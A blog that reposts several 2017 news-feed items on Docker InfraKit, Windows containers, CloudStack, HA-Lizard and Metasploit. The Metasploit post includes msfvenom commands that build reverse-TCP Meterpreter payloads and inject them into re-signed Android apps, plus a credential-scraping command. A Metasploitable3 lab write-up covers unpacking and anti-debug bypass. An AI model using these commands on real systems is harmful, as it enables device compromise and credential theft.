Wednesday, January 18, 2017

InfraKit Under the Hood: High Availability [feedly]

InfraKit Under the Hood: High Availability
http://dockr.ly/2j4Vxvd

-- via my feedly newsfeed

Back in October, Docker released InfraKit, an open source toolkit for creating and managing declarative, self-healing infrastructure. This is the first in a two-part series that dives more deeply into the internals of InfraKit.

Introduction

At Docker, our mission to build tools of mass innovation constantly challenges us to look at ways to improve the way developers and operators work. Docker Engine with integrated orchestration via Swarm mode has greatly simplified and improved the efficiency of application deployment and management of microservices. Going a level deeper, we asked ourselves if we could improve the lives of operators by making tools to simplify and automate orchestration of infrastructure resources. This led us to open source InfraKit, a set of building blocks for creating self-healing and self-managing systems.

There are articles and tutorials (such as this, and this) to help you get acquainted with InfraKit. InfraKit is made up of a set of components which actively manage infrastructure resources based on a declarative specification. These active agents continuously monitor and reconcile differences between your specification and actual infrastructure state. So far, we have implemented the functionality of scaling groups to support the creation of a compute cluster or application cluster that can self-heal and dynamically scale in size. To make this functionality available for different infrastructure platforms (e.g. AWS or bare-metal) and extensible for different applications (e.g. Zookeeper or Docker orchestration), we support customization and adaptation through the instance and flavor plugins. The group controller exposes operations for scaling in and out and for rolling updates, and communicates with the plugins using JSON-RPC 2.0 over HTTP. While the project provides packages implemented in Go for building platform-specific plugins (like this one for AWS), it is possible to use other languages and tooling to create interesting and compatible plugins.
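To make the transport a bit more concrete, here is a rough sketch of what a JSON-RPC 2.0 call to a plugin endpoint could look like; the socket path, method name and parameters below are hypothetical illustrations and are not taken from the InfraKit API documentation.

# Hypothetical example only: socket path, method name and params are illustrative.
curl --unix-socket /run/infrakit/instance-aws.sock \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc": "2.0", "id": 1, "method": "Instance.DescribeInstances", "params": {"Tags": {"group": "workers"}}}' \
  http://localhost/rpc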

High Availability

Because InfraKit is used to ensure the availability and scaling of a cluster, it needs to be highly available and perform its duties without interruption.  To support this requirement, we consider the following:

  1. Redundancy & Failover — for active management without interruption.
  2. Infrastructure State — for an accurate view of the cluster and its resources.
  3. User specification — keeping it available even in case of failure.

Redundancy & Failover

Running multiple sets of the InfraKit daemons on separate physical nodes is an obvious approach to achieving redundancy.  However, while multiple replicas are running, only one of the replica sets can be active at a time. Having at most one leader (or master) at any time ensures that multiple controllers are not independently making decisions and conflicting with one another while attempting to correct infrastructure state. However, with only one active instance at any given time, the role of the active leader must transition smoothly and quickly to another replica in the event of failure. When a node running as the leader crashes, another set of InfraKit daemons will assume leadership and attempt to correct the infrastructure state. This corrective measure will then restore the lost instance in the cluster, bringing the cluster back to the desired state before the outage.

There are many options in implementing this leadership election mechanism. Popular coordinators for this include Zookeeper and Etcd which are consensus-based systems in which multiple nodes form a quorum. Similar to these is the Docker engine (1.12+) running in Swarm Mode, which is based on SwarmKit, a native clustering technology based on the same Raft consensus algorithm as Etcd. In keeping with the goal of creating a toolkit for building systems, we made these design choices:

  1. InfraKit only needs to observe leadership in a cluster: when the node becomes the leader, the InfraKit daemons on that node become active. When leadership is lost, the daemons on the old leader are deactivated, while control is transferred over to the InfraKit daemons running on the new leader.
  2. Create a simple API for sending leadership information to InfraKit. This makes it possible to connect InfraKit to a variety of inputs, from Docker Engines in Swarm Mode (post 1.12) to polling a file in a shared file system (e.g. AWS EFS); a minimal sketch of the file-polling idea follows this list.
  3. InfraKit does not itself implement leader election. This allows InfraKit to be readily integrated into systems that already have their own manager quorum and leader election, such as Docker Swarm. Of course, it's possible to add leader election using a coordinator such as Etcd and feed that to InfraKit via the leadership observation API.
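As a minimal sketch of the file-polling input mentioned in point 2 (the file path and the way leadership would be handed to the daemons are assumptions for illustration, not InfraKit's actual mechanism):

#!/bin/sh
# Illustrative sketch: a file on a shared filesystem (e.g. AWS EFS) holds the
# hostname of the current leader; each node polls it to decide whether its
# local InfraKit daemons should be active.
LEADER_FILE=/mnt/shared/infrakit/leader   # assumed location on the shared filesystem
while true; do
  leader=$(cat "$LEADER_FILE" 2>/dev/null)
  if [ "$leader" = "$(hostname)" ]; then
    echo "this node is the leader: activate the local InfraKit daemons"
  else
    echo "standby: current leader is ${leader:-unknown}"
  fi
  sleep 5
done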

With this design, coupled with a coordinator, we can run InfraKit daemons in replicas on multiple nodes in a cluster while ensuring only one leader is active at any given time. When leadership changes, InfraKit daemons running on the new leader must be able to assess infrastructure state and determine the delta from user specification.

Infrastructure State

Rather than relying on an internal, central datastore to manage the state of the infrastructure, such as an inventory of all vm instances, InfraKit aggregates and computes the infrastructure state based on what it can observe from querying the infrastructure provider. This means that:

  1. The instance plugin needs to transform the query from the group controller to appropriate calls to the provider's API.
  2. The infrastructure provider should support labeling or tagging of provisioned resources such as vm instances (see the example after this list).
  3. In cases where the provider does not support labeling and querying resources by labels, the instance plugin has the responsibility to maintain that state. Approaches for this vary with plugin implementation but they often involve using services such as S3 for persistence.
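For example, with tagging in place, the instance plugin's query can translate into a provider API call that filters on labels. The tag key below is only illustrative and is not necessarily the one the AWS instance plugin actually uses:

aws ec2 describe-instances \
  --filters "Name=tag:infrakit.group,Values=workers" \
            "Name=instance-state-name,Values=running" \
  --query 'Reservations[].Instances[].InstanceId'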

Not having to store and manage infrastructure state greatly simplified the system. Since the infrastructure state is always aggregated and computed on-demand, it is always up to date. However, other factors such as availability and performance of the platform API itself can impact observability. For example, high latencies and even API throttling must be handled carefully in determining the cluster state and consequently deriving a plan to push toward convergence with the user's specifications.

User Specification

InfraKit daemons continuously observe the infrastructure state and compare it with the user's specification. The user's specification for the cluster is expressed in JSON format and is used to determine the necessary steps to drive towards convergence. InfraKit requires this information to be highly available so that in the event of failover, the user specification can be accessed by the new leader.
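Purely to illustrate the declarative idea (the field names below are hypothetical and do not reproduce the exact InfraKit schema; see the repo for real examples), a group specification might be shaped roughly like this:

# Field names are illustrative only, not the exact InfraKit schema.
cat > group-spec.json <<'EOF'
{
  "ID": "workers",
  "Properties": {
    "Allocation": { "Size": 3 },
    "Instance": { "Plugin": "instance-aws", "Properties": { "Tags": { "group": "workers" } } },
    "Flavor": { "Plugin": "flavor-vanilla", "Properties": { "Init": "#!/bin/sh" } }
  }
}
EOF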

There are options for implementing replication of the user specification. These range from using file systems backed by persistent stores such as S3 or EFS to using distributed key-value stores such as Zookeeper or Etcd. Like other parts of the toolkit, we opted to define an interface with different implementations of this configuration store. In the repo, there are stores implemented using the file system and Docker Swarm. More implementations are possible and we welcome contributions!

Conclusion

In this article, we have examined some of the considerations in designing InfraKit. As a system meant to be incorporated as a toolkit into larger systems, we aimed for modularity and composability. To achieve these goals, the project specifies interfaces which define the interactions of different subsystems. As a rule, we try to provide different implementations to test and demonstrate these ideas. One such implementation of high availability with InfraKit leverages Docker Engine in Swarm Mode — the native clustering and orchestration technology of the Docker Platform — to give the swarm self-healing properties. In the next installment, we will investigate this in greater detail.

Check out the InfraKit repository README for more info, a quick tutorial and to start experimenting — from plain files to Terraform integration to building a Zookeeper ensemble. Have a look, explore, and send us a PR or open an issue with your ideas!


The post InfraKit Under the Hood: High Availability appeared first on Docker Blog.

Docker for Windows Server and Image2Docker [feedly]

Docker for Windows Server and Image2Docker
http://dockr.ly/2iLw4Iq

-- via my feedly newsfeed

In December we had a live webinar focused on Windows Server Docker containers. We covered a lot of ground and we had some great feedback – thanks to all the folks who joined us. This is a brief recap of the session, which also gives answers to the questions we didn't get round to.

Webinar Recording

You can view the webinar on YouTube:

The recording clocks in at just under an hour. Here's what we covered:

  • 00:00 Introduction
  • 02:00 Docker on Windows Server 2016
  • 05:30 Windows Server 2016 technical details
  • 10:30 Hyper-V and Windows Server Containers
  • 13:00 Docker for Windows Demo – ASP.NET Core app with SQL Server
  • 25:30 Additional Partnerships between Docker, Inc. and Microsoft
  • 27:30 Introduction to Image2Docker
  • 30:00 Demo – Extracting ASP.NET Apps from a VM using Image2Docker
  • 52:00 Next steps and resources for learning Docker on Windows

Q&A

Can these [Windows] containers be hosted on a Linux host?

No. Docker containers use the underlying operating system kernel to run processes, so you can't mix and match kernels. You can only run Windows Docker images on Windows, and Linux Docker images on Linux.

However, with an upcoming release to the Windows network stack, you will be able to run a hybrid Docker Swarm – a single cluster containing a mixture of Linux and Windows hosts. Then you can run distributed apps with Linux containers and Windows containers communicating in the same Docker Swarm, using Docker's networking layer.

Is this only for ASP.NET Core apps?

No. You can package pretty much any Windows application into a Docker image, provided it can be installed and run without a UI.

The first demo in the Webinar showed an ASP.NET Core app running in Docker. The advantage with .NET Core is that it's cross-platform so the same app can run in Linux or Windows containers, and on Windows you can use the lightweight Nano Server option.

In the second demo we showed ASP.NET WebForms and ASP.NET MVC apps running in Docker. Full .NET Framework apps need to use the Windows Server Core base image, but that gives you access to the whole feature set of Windows Server 2016.
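At the time of this webinar, the two Windows base images were published on Docker Hub as microsoft/windowsservercore and microsoft/nanoserver, and you pull and run them like any other image on a Windows Server 2016 host:

docker pull microsoft/windowsservercore
docker pull microsoft/nanoserver
docker run --rm microsoft/windowsservercore cmd /c ver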

If you have existing ASP.NET applications running in VMs, you can use the Image2Docker tool to port them across to Docker images. Image2Docker works on any Windows Server VM, from Server 2003 to Server 2016.

How does licensing work?

For production, licensing is at the host level, i.e. each machine or VM which is running Docker. Your Windows licence on the host allows you to run any number of Windows Docker containers on that host. With Windows Server 2016 you get the commercially supported version of Docker included in the licence costs, with support from Microsoft and Docker, Inc.

For development, Docker for Windows runs on Windows 10 and is free, open-source software. Docker for Windows can also run a Linux VM on your machine, so you can use both Linux and Windows containers in development. Like the server version, your Windows 10 licence allows you to run any number of Windows Docker containers.

Windows admins will want a unified platform for managing images and containers. That's Docker Datacenter which is separately licensed, and will be available for Windows soon.

What about Windows updates for the containers?

Docker containers have a different life cycle from full VMs or bare-metal servers. You wouldn't deploy an app update or a Windows update inside a running container – instead you update the image that packages your app, then just kill the container and start a new container from the updated image.
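In practice that replace-not-patch workflow is just a handful of Docker commands; the image and container names here are placeholders:

# Rebuild the image on top of the freshly updated base image
docker build -t my-app:2017-01 .

# Replace the running container with one from the new image
docker stop my-app
docker rm my-app
docker run -d --name my-app my-app:2017-01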

Microsoft are supporting that workflow with the two Windows base images on Docker Hub – for Windows Server Core and Nano Server. They are following a monthly release cycle, and each release adds an incremental update with new patches and security updates.

For your own applications, you would aim to have the same deployment schedule – after a new release of the Windows base image, you would rebuild your application images and deploy new containers. All this can be automated, so it's much faster and more reliable than manual patching. Docker Captain Stefan Scherer has a great blog post on keeping your Windows containers up to date.


The post Docker for Windows Server and Image2Docker appeared first on Docker Blog.

Tuesday, January 17, 2017

Apache CloudStack 4.9.2 LTS (Long Term Support) [feedly]

Apache CloudStack 4.9.2 LTS (Long Term Support)
http://www.shapeblue.com/apache-cloudstack-4-9-2-lts-long-term-support/

-- via my feedly newsfeed

ShapeBlue are delighted to confirm that the latest version of CloudStack is now on our support matrix as a fully supported and recommended version for our customers. We have worked extensively with the CloudStack community on quality control and testing, and this release contains more than 80 bug-fixes and improvements on the CloudStack 4.9 release. We have also introduced better QA automation, testing and code reviewing.

As well as these improvements, some major new functionality has been introduced, including support for XenServer 7 and VMware vSphere 6.0 and 6.5. Already in the 4.9 release are out-of-band power management for hosts and several improvements to networking and storage. The 4.9.2 release notes include a full list of corrected issues, as well as upgrade instructions from previous versions of Apache CloudStack, and can be found here.

Long Term Support

LTS branches of CloudStack are maintained by the CloudStack community for 18 months:

  • 1-12 months: backport blocker and critical priority defect fixes in the scope (i.e. not in a new feature) of the LTS branch functionality; fix all blocker and critical priority defects identified on the LTS branch
  • 13-18 months: backport blocker and CVE (security) fixes in the scope of the LTS branch functionality; fix all blocker and critical priority defects identified on the LTS branch

For our CloudStack Infrastructure Support customers, an LTS release on the ShapeBlue support matrix will be fully supported for an additional 6 months (so a total of 2 years) including our Product Patching service.

ShapeBlue CloudStack Infrastructure Support for the 4.9 LTS branch will be provided until 1 January 2019.

Downloads

All documentation, including release notes and installation guides, as well as the packages available for download can be found on our website here.

The official installation, administration and API documentation for each release are available on the CloudStack documentation page.

More information

For more information on this latest release, or if you would like to discuss our services, please contact us at info@shapeblue.com

Xenserver High-Availability Alternative Ha-Lizard [feedly]

Xenserver High-Availability Alternative Ha-Lizard
http://xenserver.org/blog/entry/xenserver-high-availability-alternative-ha-lizard-1.html

-- via my feedly newsfeed

WHY HA AND WHAT IT DOES

XenServer (XS) contains a native high-availability (HA) option which allows quite a bit of flexibility in determining the state of a pool of hosts and under what circumstances Virtual Machines (VMs) are to be restarted on alternative hosts in the event that a host loses the ability to serve VMs. HA is a very useful feature that protects VMs from remaining down after a server crash or other incident that makes them inaccessible. Allowing a XS pool to maintain the functionality of its VMs on its own is an important feature and one that plays a large role in sustaining as much uptime as possible. Permitting the servers to deal with fail-overs automatically makes system administration easier and allows for more rapid reaction times to incidents, leading to increased up-time for servers and the applications they run.

XS allows for the designation of three different treatments of Virtual Machines: (1) always restart, (2) restart if possible, and (3) do not restart. The VMs designated with the highest restart priority will be the first to be restarted, and all will be handled provided adequate resources (primarily host memory) are available. A specific start order, allowing some VMs to be confirmed as running before others are started, can also be established. VMs will be automatically distributed among whatever remaining XS hosts are considered active. Note that, where necessary, VMs configured with expandable (dynamic) memory will be shrunk down to accommodate additional VMs, and those designated to be restarted will also run with reduced memory if necessary. If additional capacity exists to run more VMs, those designated as "restart if possible" will be brought online. VMs that are not considered essential will typically be marked as "do not restart" and hence will be left off even if they had been running before; any of these that are wanted must be restarted manually, resources permitting.

XS also allows for specifying the minimum number of active hosts to remain to accommodate failures; larger pools that are not overly populated with VMs can readily accommodate even two or more host failures.
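For reference, both the per-VM restart treatment and the pool-level failure tolerance are exposed through the xe CLI; the UUIDs below are placeholders and the parameter names should be checked against your XenServer version:

# Per-VM restart priority and start order (UUIDs are placeholders)
xe vm-param-set uuid=<vm-uuid> ha-restart-priority=restart order=1
xe vm-param-set uuid=<vm-uuid> ha-restart-priority=best-effort

# Number of host failures the pool should be able to tolerate
xe pool-param-set uuid=<pool-uuid> ha-host-failures-to-tolerate=2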

The election of which hosts are "live" and should be considered active members of the pool follows a rather involved process that combines network accessibility with access to an independently designated pooled Storage Repository (SR) that serves as an additional metric. The pooled SR can also be a Fibre Channel device, making it independent of Ethernet connections. A quorum-based algorithm is applied to establish which servers are up and active as members of the pool and which -- in the event of a pool master failure -- should be elected the new pool master.

 

WHEN HA WORKS, IT WORKS GREAT

Without going into more detail, suffice it to say that this methodology works very well; however, it requires a few prerequisite conditions that need to be taken into consideration. First of all, the mandate that a pooled storage device be available clearly means that a pool consisting of hosts that only make use of local storage is precluded. Second, there is also a constraint that for a quorum to be possible, a minimum of three hosts is required in the pool, or HA results will be unpredictable as the election of a pool master can become ambiguous. This comes about because of the so-called "split brain" issue (http://linux-ha.org/wiki/Split_Brain), which is endemic in many different operating system environments that employ a quorum as a means of making such a decision. Furthermore, while fencing (the process of isolating the host; see for example http://linux-ha.org/wiki/Fencing) is the typical recourse, the lack of intercommunication can result in a wrong decision being made and hence loss of access to VMs. Having experimented with two-host pools and the native XenServer HA, I would say that an estimate of it working about half the time is about right and, from a statistical viewpoint, pretty much what you would expect.

This limitation is, however, still of immediate concern to those with either no pooled storage and/or only two hosts in a pool. With a little bit of extra network connectivity, a relatively simple and inexpensive solution to the external SR can be provided by making a very small NFS-based SR available. The second condition, however, is not readily rectified without the expense of at least one additional host and all the connectivity associated with it. In some cases, this may simply not be an affordable option.

 

ENTER HA-LIZARD

For a number of years now, an alternative method of providing HA has been available through the program package provided by HA-Lizard (http://www.halizard.com/), a community project that provides a free alternative that neither depends on external SRs nor requires a minimum of three hosts within a pool. In this blog, the focus will be on the standard HA-Lizard version, and because the two-node pool is a particularly hard situation to handle, it will also be the main subject of discussion.

I had been experimenting for some time with HA-Lizard and found in particular that I was able to create failure scenarios whose handling needed some improvement. HA-Lizard's Salvatore Costantino was more than willing to lend an ear to the cases I had found, and this led to a very productive collaboration on investigating and implementing means to deal with a number of specific cases involving two-host pools. The result of these several months of effort is a new HA-Lizard release that manages to address a number of additional scenarios above and beyond its earlier capabilities.

It is worthwhile mentioning that there are two ways of deploying HA-Lizard:

1) Most use cases combine HA-Lizard and iSCSI-HA, which creates a two-node pool using local storage while maintaining full VM agility, with VMs able to run on either host. DRBD (http://www.drbd.org/) is implemented in this type of deployment and works very well, making use of real-time storage replication.

2) HA-Lizard, only, is used with an external Storage Repository (as in this particular case).

Before going into details of the investigation, a few words should go towards a brief explanation of how this works. Note that there is only Internet connectivity (the use of a heuristic network node) and no external SR, so how is a split brain situation then avoidable?

This is how I'd describe the course of action in this two-node situation:

If a node sees the gateway, assume it's alive. If it cannot, assume it's a good candidate for fencing. If the node that cannot see the gateway is the master, it should internally kill any running VMs, surrender its ability to be the master, and fence itself. The slave node should promote itself to master and attempt to restart any missing VMs. Any that are on the previous master will probably fail, though, because there is no communication to the old master. If the old VMs cannot be restarted, eventually the new master will be able to restart them regardless after a toolstack restart. If the slave node fails by not being able to communicate with the network, then as long as the master still sees the network but not the slave, it can assume the slave needs to fence itself and kill off its VMs, and that they will be restarted on the current master. The slave needs to realize it cannot communicate out, and therefore should kill off any of its VMs and fence itself.
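To make that decision logic a little more concrete, here is a very rough sketch of a gateway heartbeat check; this is illustrative only and is not HA-Lizard's actual implementation (the gateway address is an assumption):

#!/bin/sh
# Illustrative only: decide whether this node should fence itself based
# solely on whether the network gateway (the heuristic node) is reachable.
GATEWAY=192.168.1.1          # assumed heuristic network node
if ping -c 3 -W 2 "$GATEWAY" > /dev/null 2>&1; then
  echo "gateway reachable: this node stays up"
else
  echo "gateway unreachable: kill local VMs, surrender master role if held, fence this node"
fi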

Naturally, the trickier part comes with the timing of the various actions, since each node has to blindly assume the other is going to conduct a sequence of events. The key here is that these are all agreed on ahead of time and as long as each follows its own specific instructions, it should not matter that each of the two nodes cannot see the other node. In essence, the lack of communication in this case allows for creating a very specific course of action! If both nodes fail, obviously the case is hopeless, but that would be true of any HA configuration in which no node is left standing.

Various test plans were worked out for various cases and the table below elucidates the different test scenarios, what was expected and what was actually observed. It is very encouraging that the vast majority of these cases can now be properly handled.

 

Particularly tricky here was the case of rebooting the master server from the shell, without first disabling HA-Lizard (something one could readily forget to do). Since the fail-over process takes a while, a large number of VMs cannot be handled before the communication breakdown takes place, hence one is left with a bit of a mess to clean up in the end. Nevertheless, it's still good to know what happens if something takes place that rightfully shouldn't!

The other cases, whether intentional or not, are handled predictably and reliably, which is of course the intent. Typically, a two-node pool isn't going to have a lot of complex VM dependencies, so the lack of a start order of VMs should not be perceived as a big shortcoming. Support for this feature may even be added in a future release.

 

CONCLUSIONS

HA-Lizard is a viable alternative to the native Citrix HA configuration. It's straightforward to set up and can handle standard failover cases with a selective "restart/do not restart" setting for each VM, or it can be globally configured. There are quite a number of configuration parameters which the reader is encouraged to research in the extensive HA-Lizard documentation. There is also an on-line forum which serves as a source of information and prompt assistance with issues. The most recent release, 2.1.3, is supported on both XenServer 6.5 and 7.0.

Above all, HA-Lizard shines when it comes to handling a non-pooled storage environment and, in particular, all configurations of the dreaded two-node pool. From my direct experience, HA-Lizard now handles the vast majority of issues involved in a two-node pool and can do so more reliably than the unsupported two-node pool using Citrix's own HA application. It has been possible to conduct a lot of tests with various cases and, importantly, to do so multiple times to ensure the actions are predictable and repeatable.

I would encourage taking a look at HA-Lizard and giving it a good test run. The software is free (contributions are accepted) and it is in extensive use and has a proven track record.  For a two-host pool, I can frankly not think of a better alternative, especially with these latest improvements and enhancements.

I would also like to thank Salvatore Costantino for the opportunity to participate in this investigation and am very pleased to see the fruits of this collaboration. It has been one way of contributing to the Citrix XenServer user community that many can immediately benefit from.

 

12 Days of HaXmas: Meterpreter's new Shiny for 2016 [feedly]

12 Days of HaXmas: Meterpreter's new Shiny for 2016
https://community.rapid7.com/community/metasploit/blog/2017/01/05/12-days-of-haxmas-meterpreters-new-shiny-for-2016

-- via my feedly newsfeed

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the "gifts" we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

 

Editor's Note: Yes, this is technically an extra post to celebrate the 12th day of HaXmas. We said we liked gifts!

 

Happy new year! It is once again time to reflect on Metasploit's new payload gifts of 2016 and to make some new resolutions. We had a lot of activity with Metasploit's payload development team, thanks to OJ Reeves, Spencer McIntyre, Tim Wright, Adam Cammack, danilbaz, and all of the other contributors. Here are some of the improvements that made their way into Meterpreter this year.

 

On the first day of Haxmas, OJ gave us an Obfuscated Protocol

 

Beginning the new year with a bang (and an ABI break), we added simple obfuscation to the underlying protocol that Meterpreter uses when communicating with Metasploit framework. While it is just a simple XOR encoding scheme, it still stumped a number of detection tools, and still does today. In the game of detection cat-and-mouse, security vendors often like to pick on the open source project first, since there is practically no reverse engineering required. It is doubly surprising that this very simple technique continues to work today. Just be sure to hide that stager!

 

On the second day of Haxmas, Tim gave us two Android Services

 

Exploiting mobile devices is exciting, but a mobile session does not have the same level of always-on connectivity as an always-on server session does. It is easy to lose your session because a phone went to sleep, there was a loss of network connectivity, or the payload was swapped out for some other process. While we can't do much about networking, we did take care of the process swapping by adding the ability for Android Meterpreter to automatically launch as a background service. This means that not only does it start automatically, it does not show up as a running task, and it is able to run in a much more resilient and stealthy way.

On the third day of Haxmas, OJ gave us three Reverse Port Forwards

 

While exploits have been able to pivot server connections into a remote network through a session, Metasploit did not have the ability for a user to run a local tool and perform the same function. Now you can! Whether it's python responder or just a web server, you can now set up a locally-visible service via a Meterpreter session that is visible to your target users. This is a nice complement to standard port forwarding, which has been available with Meterpreter sessions for some time.
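A hedged example of adding a reverse forward from inside a session (the ports and address are arbitrary; run portfwd -h in a session for the exact flag semantics):

meterpreter > portfwd add -R -p 8081 -l 8080 -L 127.0.0.1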

 

On the fourth day of Haxmas, Tim gave us four Festive Wallpapers

Sometimes, when on an engagement, you just want to know 'who did I own?'. Looking around, it is not always obvious, and popping up calc.exe isn't always visible from afar, especially with those new-fangled HiDPI displays. Now Metasploit lets you change the background image on OS X, Windows and Android desktops. You can now update everyone's desktop with a festive picture of your choosing.

 

On the fifth day of Haxmas, OJ gave us five Powershell Prompts

Powershell has been Microsoft's gift both to Administrators and Penetration Test/Red Teams. While it adds a powerful amount of capabilities, it is difficult to run powershell as a standalone process using powershell.exe within a Meterpreter session for a number of reasons: it sets up its own console handling, and can even be disabled or removed from a system.

 

This is where the Powershell Extension for Meterpreter comes in. It not only makes it possible to comfortably run powershell commands from Meterpreter directly, you can also interface directly with Meterpreter straight from powershell. It uses the capabilities built into all modern Windows system libraries, so it even works if powershell.exe is missing from the system. Best of all, it never drops a file to disk. If you haven't checked it out already, make it your resolution to try out the Meterpreter powershell extension in 2017.

 

On the sixth day of Haxmas, Tim gave us six SQLite Queries

Mobile exploitation is fun for obtaining realtime data such as GPS coordinates, local WiFi access points, or even looking through the camera. But getting data from applications can be trickier. Many Android applications use SQLite for data storage, however, and armed with a local privilege escalation (of which there are now several for Android), you can now peruse local application data directly from within an Android session.

 

On the seventh day of Haxmas, danilbaz gave us seven Process Images

This one is for the security researchers and developers. Originally part of the Rekall forensic suite, winpmem allows you to automatically dump the memory image for a remote process directly back to your Metasploit console for local analysis. A bit more sophisticated than the memdump command that has shipped with Metasploit since the beginning of time, it works with many versions of Windows, does not require any files to be uploaded, and automatically takes care of any driver loading and setup. Hopefully we will also have OS X and Linux versions ready this coming year as well.

 

On the eighth day of Haxmas, Tim gave us eight Androids in Packages

The Android Meterpreter payload continues to get more full-featured and easier to use. Stageless support means that Android Meterpreter can now run as a fully self-contained APK, and without the need for staging, you can save scarce bandwidth in mobile environments. APK injection means you can now add Meterpreter as a payload on existing Android applications, even re-signing them with the signature of the original publisher. It even auto-obfuscates itself with Proguard build support.
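Hedged examples of both workflows with msfvenom (the LHOST/LPORT values and file names are placeholders):

# Stageless Android Meterpreter as a self-contained APK
msfvenom -p android/meterpreter_reverse_tcp LHOST=203.0.113.10 LPORT=4444 -o meterpreter.apk

# Inject Meterpreter into an existing application APK used as a template
msfvenom -x original.apk -p android/meterpreter/reverse_tcp LHOST=203.0.113.10 LPORT=4444 -o injected.apk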

 

On the ninth day of Haxmas, zeroSteiner gave us nine Resilient Serpents

Python Meterpreter saw a lot of love this year. In addition to a number of general bugfixes, it is now much more resilient on OS X and Windows platforms. On Windows, it can now automatically identify the Windows version, whether from Cygwin or as a native application. From OS X, reliability is greatly improved by avoiding using some of the more fragile OS X python extensions that can cause the Python interpreter to crash.

 

On the tenth day of Haxmas, OJ gave us ten Universal Handlers

Have you ever been confused about what sort of listener you should use on an engagement? Not sure if you'll be using 64-bit or 32-bit Linux when you target your hosts? Fret no more, the new universal HTTP payload, aka multi/meterpreter/reverse_http(s), now allows you to just set it and forget it.

 

On the eleventh day of Haxmas, Adam and Brent gave us eleven Posix Payloads

Two years ago, I started working at Rapid7 as a payloads specialist, and wrote this post (https://community.rapid7.com/community/metasploit/blog/2015/01/05/maxing-meterpreters-mettle) outlining my goals for the year. Shortly after, I got distracted with a million other amazing Metasploit projects, but still kept the code on the back burner. This year, Adam, myself, and many others worked on the first release of Mettle, a new Posix Meterpreter with an emphasis on portability and performance. Got a SOHO router? Mettle fits. Got an IBM Mainframe? Mettle works there too! OSX, FreeBSD, OpenBSD? It works there as well. Look forward to many more improvements in the Posix and embedded post-exploitation space, powered by the new Mettle payload.

 

On the twelfth day of Haxmas, OJ gave us twelve Scraped Credentials

Have you heard? Meterpreter now has the latest version of mimikatz integrated as part of the kiwi extension, which allows all sorts of credential-scraping goodness, supporting Windows XP through Server 2016. As a bonus, it still runs completely in memory for stealthy operation. It is now easier than ever to keep Meterpreter up-to-date with upstream thanks to some nice new hooking capabilities in Mimikatz itself. Much thanks to gentilkiwi and OJ for the Christmas present.
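Inside a session this looks roughly like the following (output omitted):

meterpreter > load kiwi
meterpreter > creds_all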

 

Hope your 2017 is bright and look forward to many more gifts this coming year from the Metasploit payloads team!

Breaking Metasploitable3: The King of Clubs [feedly]

Breaking Metasploitable3: The King of Clubs
https://community.rapid7.com/community/metasploit/blog/2017/01/09/breaking-metasploitable3-the-king-of-clubs

-- via my feedly newsfeed

Metasploitable3 is a free virtual machine that we have recently created to allow people to simulate attacks using Metasploit. In it, we have planted multiple flags throughout the whole system; they are basically collectable poker card images of some of the Rapid7/Metasploit developers. Some are straight-forward and easy to open, some are hidden, or obfuscated, etc. Today, we would like to share the secret to unlocking one of these cards: the King of Clubs.

 

The King of Clubs is one of the fun flags to extract. This card can be found in the C:\Windows\System32 directory, and it's an executable. To retrieve it, you will need to compromise the host first. In this demonstration, we will SSH into the host. And when calling the King of Clubs executable, we are greeted with the following riddle:

 

 

Binary Analysis

 

Obviously, this executable requires a closer examination. So ideally, you want to download this binary somewhere to your favorite development/reversing environment:

 

 

If you attempt to look at the executable with a debugger, you will notice that the binary is packed, which makes it difficult to read. There are multiple ways to figure out what packer is used for the executable: you will most likely discover it by inspecting the PE structure, which contains multiple UPX sections, or you can use PEiD to tell you:

 

 

UPX is a binary compression tool that is commonly used by malware to make reverse engineering a little bit more difficult. It is so common that you can find an unpacker pretty easily, as well. In this example, we are using PE Explorer because it's free. PE Explorer will automatically recognize that our binary is packed with UPX, and unpack it. So all you have to do is open the binary with it and click save:
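If you prefer the command line to PE Explorer, the UPX tool itself can unpack the file; the filename here is a placeholder for wherever you copied the binary:

upx -d king_of_clubs.exe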

 

 

There, that wasn't too painful. Was it?

 

At this point, we are ready to read the binary with a disassembler. Let's start with the main function:

 

 

As we can see, the first thing the program does is check whether there is a debugger attached or not. If there is, then the program exits:

 

 

If you are doing dynamic analysis, don't forget to disable this :-)

 

The next thing it does is check whether the current user is "hdmoore" or not. If yes, then it writes a card to disk. If not, it prints out the riddle that we saw previously:

 

 

Let's look at how the card is created in a little more detail. First off, we see that the constructor of the Card class initializes something with the value 0x0f; this piece of information is important for later:

 

 

After the initialization, our main function calls the writeCard function.

 

The writeCard function does two things. First, it iterates through a big chunk of data of 76473h bytes, XORing each byte. If you pay attention to where EAX comes from, which is [EBP+ARG_0], you should remember that it's the value the Card class initialized. So this means the writeCard function is XORing a big chunk of data with 0x0F:

 

 

After the function is done XORing, it's ready to write the data to disk using ofstream. The first argument of ofstream's open function reveals that we are trying to write a file named "king_of_clubs.png":

 

 

After the file is written, we are at the end of the function, and that leads us to the end of the program.

 

Ways to Extraction

 

Now that we understand how the program works, we have some options to extract the XOR'd image from the binary:

 
  • Since IDA already tells us where the XOR'd PNG data is at, we can extract 76474h bytes, and then XOR back the data with 0x0f.
  • Bypass the IsDebuggerPresent call with OllyDBG, and modify the JNZ jump for strcmp, which will force the program to always produce the card.
  • This is probably the easiest one: create a user named "hdmoore" and run the program again:
 

 

And that's how you reverse engineer the challenge. Now, go ahead and give this a try, and see who the King of Clubs is. If you like this challenge, don't feel shy to try the other 14 Metasploitable3 flags as well :-)

 

If you haven't tried Metasploitable3 but finally want to get your hands dirty, you can get it here. Keep in mind that Metasploitable3 is a vulnerable image that's heavily exploitable by Metasploit, so if you don't have Metasploit, you should download that and put it in your tool box :-)

Habitat application portability and understanding dynamic linking of ELF binaries [feedly]

Habitat application portability and understanding dynamic linking of ELF binaries
https://blog.chef.io/2017/01/12/habitat-application-portability-and-understanding-dynamic-linking-of-elf-binaries/

-- via my feedly newsfeed

This post was originally published on the Hurry Up and Wait! blog on December 30, 2016.

I do not come from a classical computer science background and have spent the vast majority of my career working with Java, C# and Ruby – mostly on Windows. So I have managed to evade the details of exactly how native binaries find their dependencies at compile time and runtime on Linux. It just has not been a concern in the work that I do. If my app complains about missing low level dependencies, I find a binary distribution for Windows (99% of the time these exist and work across all modern Windows platforms) and install the MSI. Hopefully when the app is deployed, those same binary dependencies have been deployed on the production nodes, and it would be just super if it's the same version.

